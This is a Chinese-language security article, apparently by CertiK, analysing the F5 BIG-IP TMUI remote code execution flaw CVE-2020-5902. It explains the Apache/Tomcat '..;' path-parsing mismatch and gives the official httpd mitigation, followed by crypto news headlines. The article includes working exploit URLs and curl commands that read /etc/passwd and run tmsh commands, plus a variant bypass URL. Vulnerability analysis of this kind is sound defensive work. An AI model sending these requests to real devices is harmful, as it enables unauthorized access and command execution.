
CertiK:深度解析F5 BIG-IP远程代码执行漏洞
前言
今日一早,推特以及各大技术论坛上炸开了锅,安全圈子的人都在讨论F5设备里远程代码执行的漏洞。很多讨论的内容,大部分是在分享如何寻找目标,利用漏洞,并没有关于对漏洞成因的分析。CertiK的安全研究员下载了存在漏洞的程序,搭建环境复现漏洞后,对漏洞的起因进行了分析,并在下文分享给大家。
背景
F5 BIG-IP是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。Positive Technologies的研究人员Mikhail Klyuchnikov 发现其配置工具Traffic Management User Interface(TMUI)中存在远程代码执行漏洞,CVE编号为CVE-2020-5902。该漏洞CVSSv3评分为10分,攻击者可利用该漏洞创建或删除文件,关闭服务、执行任意的系统命令,最终获得服务器的完全控制权。CVE具体表述请查看文章底部参考链接1。
受影响的BIG-IP软件版本
【15.0.0-15.1.0.3】【14.1.0-14.1.2.5】【13.1.0-13.1.3.3】【12.1.0-12.1.5.1】【11.6.1-11.6.5.1】
漏洞利用
读取任意文件:
curl-k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
远程执行tmsh命令:
curl -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
官方给出的临时修复方案(后文会对修复进行分析):
漏洞复现
在F5的官网注册账号之后,可以从F5的资源库中下载存在漏洞的BIG-IP软件。访问参考链接2可以下载BIG-IP TMOS(Traffic Management Operating System, 流量管理操作系统)的虚拟机镜像。CertiK技术团队因为使用Vmware Fusion, 下载的是“BIGIP-15.0.0-0.0.39.ALL_1SLOT-vmware.ova-Image fileset for VMware ESX/i Server”。
在Vmware Fusion中加载镜像(import):
加载完成之后,使用默认用户名密码登陆系统:
用户名: root
密码: default
系统初始化之后,使用”ifconfig”命令查询虚拟机IP地址。CertiK技术团队的BIG-IP TMUI虚拟机IP地址为”172.16.4.137”。
在浏览器中访问BIG-IP TMUI登陆界面:
https://172.16.4.137/tmui/login.jsp
复现任意文件读取:
在浏览器中访问以下地址可以读取”/etc/passwd”文件内容:
https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
复现tmsh命令执行:
https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
漏洞分析
在进入漏洞分析前,先要明确一点:漏洞利用中的fileRead.jsp和tmshCmd.jsp文件在用户登陆后本身是可以被访问的。
下面的截图显示了登陆前和登陆后访问以下URL的区别:
https://172.16.4.137/tmui/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
登陆前访问:
被跳转回登陆界面
输入账号密码登陆管理界面之后再访问,可执行fileRead.jsp读取文件。
fileRead.jsp和tmshCmd.jsp虽然是在PoC中最终被利用的文件,但是他们并不是漏洞的起因。此漏洞的本质是利用Apache和后台Java(tomcat)对URL的解析方式不同来绕过登陆限制, 在未授权的情况下,访问后台JSP模块。CertiK技术人员第一次注意到此类型漏洞是在2018年Orange的BlackHat演讲: “Breaking Parser Logic Take Your Path Normalization Off and Pop 0Days Out”. 这里可以查看演讲稿件(参考链接2)。
这里我们可以理解在F5 BIG-IP的后台服务器对收到了URL请求进行了两次的解析,第一次是httpd(Apache), 第二次是后一层的Java(tomcat).
在URL在第一次被Apache解析时,Apache关注的是URL的前半段
https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
当Apache在看见前半段是合法URL且是允许被访问的页面时,就把它交给了后面的第二层。Apache在这里完全把URL里面关键的 /..;/ 给无视了。
在URL在第二次被解析时,后面的Java(tomcat)会把/..;/理解为,向上返回一层路径。此时, /login.jsp/ 和 /..;/ 会抵消掉。Tomcat看到的真正请求从
https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
变成了:
https://172.16.4.137/tmui/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
再来fileRead.jsp并没有对收到的请求进行身份验证,后台因此直接执行fileRead.jsp, 读取并返回了/etc/passwd文件的内容。
根据以上的思路,其实可以找出别的利用漏洞的URL, 比如:
https://172.16.4.137/tmui/tmui/login/legal.html/..;/..;/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
这里“https://172.16.4.137/tmui/tmui/login/legal.html”和之前的“login.jsp”一样,是一个不需要登陆就能访问的页面。但是因为要向上返回两次,需要用两个/..;/来抵消掉 ”/login/legal.html”。
回到开头提到的官方给出的临时修复方案, 修复方案的本质是在httpd的配置中添加以下规则:
include '
<LocationMatch ".*\.\.;.*">
Redirect 404 /
</LocationMatch>
'
这个规则的意思是,当http服务器在监测到URL中包含..;(句号句号分号)的时候,直接返回404. 这样利用漏洞的请求就没办法到达后台(第二层)了。
如何避免漏洞:
此漏洞的利用方式在网络上公开之后,因为它的攻击成本低廉,大批黑客都开始图谋利用此漏洞攻击使用F5 BIG-IP产品的系统。黑客只需要付出极小的代价就能获得目标系统的控制权,对系统产生巨大的破坏。
俗话说:“不怕贼偷,就怕贼惦记”。即便这样的黑客攻击事件这次没有发生在你身上,不代表你是安全的。因为很有可能黑客的下一个目标就是你。
而Certik的专业技术团队会帮你彻底打消这种“贼惦记”的担忧。CertiK专业渗透测试团队会通过对此类事件的监测,第一时间给客户提交漏洞预警报告,帮助客户了解漏洞细节以及防护措施。此举可以确保客户的系统不受攻击并且不会遭受财产损失。
同时作为一名安全技术人员,在新漏洞被发现的时,不仅需要知道漏洞是如何被黑客利用的,更要去探寻漏洞背后的原因,方可积累经验,更加有能力在复杂的系统中发现隐藏的漏洞。
CertiK以及其技术人员,将永远把安全当做信仰,与大家一同学习并一同成长。
参考链接
1.https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5902
2.https://downloads.f5.com/esd/ecc.sv?sw=BIG-IP&pro=big-ip_v15.x&ver=15.0.0&container=Virtual-Edition
3.https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
来源:CertiK中文社区
比推快讯
更多 >>- 野村证券:贸易关税进一步明确可能帮助市场最终走高
- 数据:某巨鲸链上分两笔买入 4862.95 枚 ETH ,总价值 1249 万美元
- Bitunix 分析师:宏观乐观情绪蔓延,ETH 震荡上行,关注 2525 与 2275 支撑区域
- Xterio 开启 PAL 质押活动,当前 XTER 池预期年化收益率为 5281.71%
- Ave.ai 支持 xStocks 协议,上线链上美股交易功能
- Matrixport:市场缺乏新的推动因素,散户交易活跃度持续疲软
- 去中心化 AI 训练平台 FLock.io 代币质押量突破 6000 万枚,占流通量 31%
- 某 Coinbase 黑客花费 1250 万枚 DAI 买入 4863 枚 ETH
- Binance:Alpha 用户参与 PAL TGE 积分门槛为 202 分
- 模块化自动化协议平台 Questflow.ai 正式接入 Circle Alliance Program
- 机构:市场并未对特朗普关税感到恐慌
- Virtuals:Genesis 空投将不再自动发放,用户需手动申领
- 英国上市公司 Tao Alpha 拟任命 UTXO Management BTCfi 负责人为非执行董事
- 数据:澳大利亚 Monochrome 现货比特币 ETF 的 BTC 持仓升至 937 枚
- 观点:若本轮牛市与此前两轮类似,则还有半年到达市场顶部
- 欧洲上市公司 The Blockchain Group 增持 116 枚比特币,总持仓达 1904 枚
- 土耳其本月已关闭 46 个加密货币平台的访问权限
- The Smarter Web Company 增持 226.42 枚比特币
- 数据:过去 7 天 BNB Chain 跨链桥净流入资金达 10.08 亿美元,以太坊净流出 9.86 亿美元
- 德勤调查:英国企业对投资美国失去兴趣
- MYX 短时上涨触及 0.14 USDT,24H 涨幅 96.22%
- CZ:币安在成立首年便实现了约 10 亿美元的利润
- 48 Club:因后台逻辑错误致用户误领 1807 枚 KOGE,约 86736 美元
- 无锡市委改革任务推进会:探索稳定币赋能外贸发展的实践路径
- Metaplanet 宣布增持 2205 枚比特币
- 俄罗斯开始建立全国加密货币挖矿设备注册系统,以打击非法挖矿活动并增加税收
- Letsbonk 近 24 小时 Solana 发币平台市场份额升至 55.1%,pump.fun 跌至 34.9%
- 数据:USDC Treasury 于以太坊链上销毁 6000 万枚 USDC
- 许正宇:代币化绿色债券结算周期缩短至 T+1,提升交易效率
- 币安将调整部分资产抵押率
- 或受益于回购策略,BONK 及其生态开发协议 Graphite Protocol 代币近一周持续上涨
- 以太坊现货 ETF 上周净流入 2.19 亿美元,持续八周净流入
- 链上分析师监测 GT 2025 Q2 链上销毁超 192 万枚
- 深圳发布风险提示:警惕以稳定币名义实施非法集资
- 受利空消息影响,BAKE 币价短时大幅波动,合约交易激增
- 币安将为 BAKE、IDEX 和 SLF 添加观察标签
- Project Hunt:公正实时的预测市场 Polymarket 为过去 7 天被 Top 人物取关最多的项目
- 乌克兰对助俄加密货币转移资产的实体实施制裁,涉及 60 家公司
- 港股加密货币概念股早盘震荡走高,国泰君安国际涨超 7%
- 加密 KOL Unipcs 已将绝大部分免费获得的 SAVIOUR 销毁,其余兑换为价值 22.3 万美元 USELESS
- OKX CEO Star:仅 1%左右用户会收到资金或工作居住信息问询,不会出现不让用户提币的情况
- 特朗普:任何与金砖国家反美政策保持一致的国家,将被征收额外 10% 关税
- Babylon:将于 2025 年 Q3 上线比特币多质押测试网
- 香港虚拟资产 OTC 交易托管服务拟由证监会而非海关负责主要监管
- 远光软件:公司区块链技术可应用于 RWA 领域,但目前暂未涉及该业务
- 上海:组织实施区块链技术应用等新基建重大示范工程项目
- 特朗普:将于美东时间周一中午 12 点发出关税信函
- Sushi CEO:Sushi 将于明天上线 Katana 奖励计划,将发放 4 亿枚 KAT 代币奖励
- 美众议院加密税制框架听证会因休会延期,新日期未定
- Airwallex 正组建稳定币平台团队,拟构建全球代币结算系统
比推专栏
更多 >>观点
比推热门文章
- Bitunix 分析师:宏观乐观情绪蔓延,ETH 震荡上行,关注 2525 与 2275 支撑区域
- Xterio 开启 PAL 质押活动,当前 XTER 池预期年化收益率为 5281.71%
- Ave.ai 支持 xStocks 协议,上线链上美股交易功能
- Matrixport:市场缺乏新的推动因素,散户交易活跃度持续疲软
- 去中心化 AI 训练平台 FLock.io 代币质押量突破 6000 万枚,占流通量 31%
- 某 Coinbase 黑客花费 1250 万枚 DAI 买入 4863 枚 ETH
- Binance:Alpha 用户参与 PAL TGE 积分门槛为 202 分
- 模块化自动化协议平台 Questflow.ai 正式接入 Circle Alliance Program
- 机构:市场并未对特朗普关税感到恐慌
- Virtuals:Genesis 空投将不再自动发放,用户需手动申领